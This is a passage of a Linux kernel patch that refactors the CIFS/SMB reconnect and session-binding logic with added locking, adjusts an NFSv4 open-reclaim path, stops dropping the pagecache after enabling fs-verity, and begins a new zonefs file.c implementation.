+-	int retries;
+ 
+ 	/*
+ 	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+@@ -98,45 +97,9 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+ 
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
+-
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -4356,8 +4319,13 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+ 		return -ENODEV;
+ 
+ getDFSRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc, (void **) &pSMB,
+-		      (void **) &pSMBr);
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 7aecb1646b6fc..077c88c49dfdf 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -261,31 +261,42 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			cifs_chan_update_iface(ses, server);
+ 
+ 		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server))
+-			goto next_session;
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
+ 
+ 		if (mark_smb_session)
+ 			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+ 		else
+ 			cifs_chan_set_need_reconnect(ses, server);
+ 
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
+ 		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses))
+-			goto next_session;
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
+ 
++		spin_lock(&ses->ses_lock);
+ 		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
+ 
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
+ 			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
+ 		}
+ 		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
+ 			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
+ 		}
+-
+-next_session:
+-		spin_unlock(&ses->chan_lock);
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ }
+@@ -4050,11 +4061,19 @@ cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&server->srv_lock);
+-	if (!server->ops->need_neg(server) ||
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
+ 	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
+ 		spin_unlock(&server->srv_lock);
+ 		return 0;
+ 	}
++
+ 	server->tcpStatus = CifsInNegotiate;
+ 	spin_unlock(&server->srv_lock);
+ 
+@@ -4082,39 +4101,48 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 		   struct nls_table *nls_info)
+ {
+ 	int rc = -ENOSYS;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+ 	bool is_binding = false;
+ 
+ 	spin_lock(&ses->ses_lock);
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-	else
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
+ 
+ 	if (ses->ses_status != SES_GOOD &&
+ 	    ses->ses_status != SES_NEW &&
+ 	    ses->ses_status != SES_NEED_RECON) {
+ 		spin_unlock(&ses->ses_lock);
+-		return 0;
++		return -EHOSTDOWN;
+ 	}
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses) ||
+-	    cifs_chan_in_reconnect(ses, server)) {
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 		return 0;
+ 	}
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++
+ 	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+ 	if (!is_binding)
+ 		ses->ses_status = SES_IN_SETUP;
+ 	spin_unlock(&ses->ses_lock);
+ 
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
+ 	if (!is_binding) {
+ 		ses->capabilities = server->capabilities;
+ 		if (!linuxExtEnabled)
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 4e54736a06996..832856aef4b7a 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1382,3 +1382,47 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 	return 0;
+ }
+ #endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 6e6e44d8b4c79..b37379b62cc77 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,72 +139,12 @@ out:
+ 	return;
+ }
+ 
+-static int wait_for_server_reconnect(struct TCP_Server_Info *server,
+-				     __le16 smb2_command, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-	 * here since they are implicitly done when session drops.
+-	 */
+-	switch (smb2_command) {
+-	/*
+-	 * BB Should we keep oplock break and add flush to exceptions?
+-	 */
+-	case SMB2_TREE_DISCONNECT:
+-	case SMB2_CANCEL:
+-	case SMB2_CLOSE:
+-	case SMB2_OPLOCK_BREAK:
+-		return -EAGAIN;
+-	}
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until
+-	 * process is killed or server comes back on-line.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
+-
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	struct nls_table *nls_codepage;
++	struct nls_table *nls_codepage = NULL;
+ 	struct cifs_ses *ses;
+ 
+ 	/*
+@@ -239,7 +179,28 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -255,8 +216,7 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		 tcon->ses->chans_need_reconnect,
+ 		 tcon->need_reconnect);
+ 
+-	nls_codepage = load_nls_default();
+-
++	mutex_lock(&ses->session_mutex);
+ 	/*
+ 	 * Recheck after acquire mutex. If another thread is negotiating
+ 	 * and the server never sends an answer the socket will be closed
+@@ -265,28 +225,38 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&server->srv_lock);
+ 	if (server->tcpStatus == CifsNeedReconnect) {
+ 		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
+ 		rc = -EHOSTDOWN;
+ 		goto out;
+ 	}
+ 	spin_unlock(&server->srv_lock);
+ 
++	nls_codepage = load_nls_default();
++
+ 	/*
+ 	 * need to prevent multiple threads trying to simultaneously
+ 	 * reconnect the same SMB session
+ 	 */
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
+ 		spin_unlock(&ses->chan_lock);
+-
++		spin_unlock(&ses->ses_lock);
+ 		/* this means that we only need to tree connect */
+ 		if (tcon->need_reconnect)
+ 			goto skip_sess_setup;
+ 
++		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+-	mutex_lock(&ses->session_mutex);
+ 	rc = cifs_negotiate_protocol(0, ses, server);
+ 	if (!rc) {
+ 		rc = cifs_setup_session(0, ses, server, nls_codepage);
+@@ -302,10 +272,8 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&ses->session_mutex);
+ 
+ skip_sess_setup:
+-	mutex_lock(&ses->session_mutex);
+ 	if (!tcon->need_reconnect) {
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+@@ -320,7 +288,7 @@ skip_sess_setup:
+ 	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+ 	if (rc) {
+ 		/* If sess reconnected but tcon didn't, something strange ... */
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+ 		goto out;
+ 	}
+ 
+@@ -1292,9 +1260,9 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	if (rc)
+ 		return rc;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	if (is_binding) {
+ 		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+@@ -1452,9 +1420,9 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
+@@ -1578,9 +1546,9 @@ SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+ 
+ 	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+@@ -1646,9 +1614,9 @@ SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+ 
+ 	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index d827b7547ffad..790acf65a0926 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -81,6 +81,7 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	struct cifs_ses *ses = NULL;
+ 	int i;
+ 	int rc = 0;
++	bool is_binding = false;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 
+@@ -97,9 +98,12 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	goto out;
+ 
+ found:
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(ses, server) &&
+-	    !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
+ 		/*
+ 		 * If we are in the process of binding a new channel
+ 		 * to an existing session, use the master connection
+@@ -107,6 +111,7 @@ found:
+ 		 */
+ 		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
+ 		goto out;
+ 	}
+ 
+@@ -119,10 +124,12 @@ found:
+ 		if (chan->server == server) {
+ 			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+ 			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
+ 			goto out;
+ 		}
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	cifs_dbg(VFS,
+ 		 "%s: Could not find channel signing key for session 0x%llx\n",
+@@ -392,11 +399,15 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 	bool is_binding = false;
+ 	int chan_index = 0;
+ 
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
+ 	chan_index = cifs_ses_get_chan_index(ses, server);
+ 	/* TODO: introduce ref counting for channels when the can be freed */
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/*
+ 	 * All channels use the same encryption/decryption keys but
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index d70da78e698d2..70e76359909cc 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -1980,8 +1980,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 	if (!data->rpc_done) {
+ 		if (data->rpc_status)
+ 			return ERR_PTR(data->rpc_status);
+-		/* cached opens have already been processed */
+-		goto update;
++		return nfs4_try_open_cached(data);
+ 	}
+ 
+ 	ret = nfs_refresh_inode(inode, &data->f_attr);
+@@ -1990,7 +1989,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 
+ 	if (data->o_res.delegation_type != 0)
+ 		nfs4_opendata_check_deleg(data, state);
+-update:
++
+ 	if (!update_open_stateid(state, &data->o_res.stateid,
+ 				NULL, data->o_arg.fmode))
+ 		return ERR_PTR(-EAGAIN);
+diff --git a/fs/verity/enable.c b/fs/verity/enable.c
+index df6b499bf6a14..400c264bf8930 100644
+--- a/fs/verity/enable.c
++++ b/fs/verity/enable.c
+@@ -390,25 +390,27 @@ int fsverity_ioctl_enable(struct file *filp, const void __user *uarg)
+ 		goto out_drop_write;
+ 
+ 	err = enable_verity(filp, &arg);
+-	if (err)
+-		goto out_allow_write_access;
+ 
+ 	/*
+-	 * Some pages of the file may have been evicted from pagecache after
+-	 * being used in the Merkle tree construction, then read into pagecache
+-	 * again by another process reading from the file concurrently.  Since
+-	 * these pages didn't undergo verification against the file digest which
+-	 * fs-verity now claims to be enforcing, we have to wipe the pagecache
+-	 * to ensure that all future reads are verified.
++	 * We no longer drop the inode's pagecache after enabling verity.  This
++	 * used to be done to try to avoid a race condition where pages could be
++	 * evicted after being used in the Merkle tree construction, then
++	 * re-instantiated by a concurrent read.  Such pages are unverified, and
++	 * the backing storage could have filled them with different content, so
++	 * they shouldn't be used to fulfill reads once verity is enabled.
++	 *
++	 * But, dropping the pagecache has a big performance impact, and it
++	 * doesn't fully solve the race condition anyway.  So for those reasons,
++	 * and also because this race condition isn't very important relatively
++	 * speaking (especially for small-ish files, where the chance of a page
++	 * being used, evicted, *and* re-instantiated all while enabling verity
++	 * is quite small), we no longer drop the inode's pagecache.
+ 	 */
+-	filemap_write_and_wait(inode->i_mapping);
+-	invalidate_inode_pages2(inode->i_mapping);
+ 
+ 	/*
+ 	 * allow_write_access() is needed to pair with deny_write_access().
+ 	 * Regardless, the filesystem won't allow writing to verity files.
+ 	 */
+-out_allow_write_access:
+ 	allow_write_access(filp);
+ out_drop_write:
+ 	mnt_drop_write_file(filp);
+diff --git a/fs/zonefs/Makefile b/fs/zonefs/Makefile
+index 9fe54f5319f22..645f7229de4a0 100644
+--- a/fs/zonefs/Makefile
++++ b/fs/zonefs/Makefile
+@@ -3,4 +3,4 @@ ccflags-y				+= -I$(src)
+ 
+ obj-$(CONFIG_ZONEFS_FS) += zonefs.o
+ 
+-zonefs-y	:= super.o sysfs.o
++zonefs-y	:= super.o file.o sysfs.o
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+new file mode 100644
+index 0000000000000..63cd50840419c
+--- /dev/null
++++ b/fs/zonefs/file.c
+@@ -0,0 +1,902 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Simple file system for zoned block devices exposing zones as files.
++ *
++ * Copyright (C) 2022 Western Digital Corporation or its affiliates.
++ */
++#include <linux/module.h>
++#include <linux/pagemap.h>
++#include <linux/iomap.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/blkdev.h>
++#include <linux/statfs.h>
++#include <linux/writeback.h>
++#include <linux/quotaops.h>
++#include <linux/seq_file.h>
++#include <linux/parser.h>
++#include <linux/uio.h>
++#include <linux/mman.h>
++#include <linux/sched/mm.h>
++#include <linux/task_io_accounting_ops.h>
++
++#include "zonefs.h"
++
++#include "trace.h"
++
++static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
++				   loff_t length, unsigned int flags,
++				   struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/*
++	 * All blocks are always mapped below EOF. If reading past EOF,
++	 * act as if there is a hole up to the file maximum size.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_HOLE;
++		iomap->addr = IOMAP_NULL_ADDR;
++		iomap->length = length;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_read_iomap_ops = {
++	.iomap_begin	= zonefs_read_iomap_begin,
++};
++
++static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
++				    loff_t length, unsigned int flags,
++				    struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/* All write I/Os should always be within the file maximum size */
++	if (WARN_ON_ONCE(offset + length > z->z_capacity))
++		return -EIO;
++
++	/*
++	 * Sequential zones can only accept direct writes. This is already
++	 * checked when writes are issued, so warn if we see a page writeback
++	 * operation.
++	 */
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z) && !(flags & IOMAP_DIRECT)))
++		return -EIO;
++
++	/*
++	 * For conventional zones, all blocks are always mapped. For sequential
++	 * zones, all blocks are always mapped below the inode size (zone
++	 * write pointer) and unwritten beyond.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_UNWRITTEN;
++		iomap->length = z->z_capacity - iomap->offset;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_write_iomap_ops = {
++	.iomap_begin	= zonefs_write_iomap_begin,
++};
++
++static int zonefs_read_folio(struct file *unused, struct folio *folio)
++{
++	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
++}
++
++static void zonefs_readahead(struct readahead_control *rac)
++{
++	iomap_readahead(rac, &zonefs_read_iomap_ops);
++}
++
++/*
++ * Map blocks for page writeback. This is used only on conventional zone files,
++ * which implies that the page range can only be within the fixed inode size.
++ */
++static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
++				   struct inode *inode, loff_t offset)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z)))
++		return -EIO;
++	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
++		return -EIO;
++
++	/* If the mapping is already OK, nothing needs to be done */
++	if (offset >= wpc->iomap.offset &&
++	    offset < wpc->iomap.offset + wpc->iomap.length)
++		return 0;
++
++	return zonefs_write_iomap_begin(inode, offset,
++					z->z_capacity - offset,
++					IOMAP_WRITE, &wpc->iomap, NULL);
++}
++
++static const struct iomap_writeback_ops zonefs_writeback_ops = {
++	.map_blocks		= zonefs_write_map_blocks,
++};
++
++static int zonefs_writepages(struct address_space *mapping,
++			     struct writeback_control *wbc)
++{
++	struct iomap_writepage_ctx wpc = { };
++
++	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
++}
++
++static int zonefs_swap_activate(struct swap_info_struct *sis,
++				struct file *swap_file, sector_t *span)
++{
++	struct inode *inode = file_inode(swap_file);
++
++	if (zonefs_inode_is_seq(inode)) {
++		zonefs_err(inode->i_sb,
++			   "swap file: not a conventional zone file\n");
++		return -EINVAL;
++	}
++
++	return iomap_swapfile_activate(sis, swap_file, span,
++				       &zonefs_read_iomap_ops);
++}
++
++const struct address_space_operations zonefs_file_aops = {
++	.read_folio		= zonefs_read_folio,
++	.readahead		= zonefs_readahead,
++	.writepages		= zonefs_writepages,
++	.dirty_folio		= filemap_dirty_folio,
++	.release_folio		= iomap_release_folio,
++	.invalidate_folio	= iomap_invalidate_folio,
++	.migrate_folio		= filemap_migrate_folio,
++	.is_partially_uptodate	= iomap_is_partially_uptodate,
++	.error_remove_page	= generic_error_remove_page,
++	.direct_IO		= noop_direct_IO,
++	.swap_activate		= zonefs_swap_activate,
++};
++
++int zonefs_file_truncate(struct inode *inode, loff_t isize)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t old_isize;
++	enum req_op op;
++	int ret = 0;
++
++	/*
++	 * Only sequential zone files can be truncated and truncation is allowed
++	 * only down to a 0 size, which is equivalent to a zone reset, and to
++	 * the maximum file size, which is equivalent to a zone finish.
++	 */
++	if (!zonefs_zone_is_seq(z))
++		return -EPERM;
++
++	if (!isize)
++		op = REQ_OP_ZONE_RESET;
++	else if (isize == z->z_capacity)
++		op = REQ_OP_ZONE_FINISH;
++	else
++		return -EPERM;
++
++	inode_dio_wait(inode);
++
++	/* Serialize against page faults */
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/* Serialize against zonefs_iomap_begin() */
++	mutex_lock(&zi->i_truncate_mutex);
++
++	old_isize = i_size_read(inode);
++	if (isize == old_isize)
++		goto unlock;
++
++	ret = zonefs_inode_zone_mgmt(inode, op);
++	if (ret)
++		goto unlock;
++
++	/*
++	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
